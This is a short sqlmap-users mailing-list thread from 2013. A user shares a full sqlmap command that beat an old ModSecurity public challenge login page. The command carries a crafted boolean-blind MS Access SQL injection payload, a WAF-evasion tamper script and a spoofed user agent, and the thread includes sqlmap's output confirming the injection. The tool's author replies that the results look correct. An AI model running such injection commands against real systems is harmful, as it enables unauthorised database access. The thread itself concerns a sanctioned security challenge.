Hi Marcell.
And what makes you think that you are not getting right results? The
results you've sent look quite right.
Kind regards,
Miroslav Stampar
On Fri, May 31, 2013 at 10:34 AM, Marcell Fodor <fodor.em...@gmail.com> wrote:
> Heya,
>
> I had some time to play around with an old ModSecurity challenge here:
> http://www.modsecurity.org/zero.webappsecurity.com/
>
> I did make this work under sqlmap:
>
> python ./sqlmap.py -u "
> http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data
> "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
> --string "Object moved" --technique "b" --dbms "msaccess" --tamper
> "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
> rv:21.0) Gecko/20100101 Firefox/21.0"
>
> I had to remove %0C from space2randomblank to make this work.
>
> Response:
>
> Place: (custom) POST
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
> 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
> --
>
> Is the challenge way outdated or something I do wrong?
>
> M
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
Miroslav Stampar
http://about.me/stamparm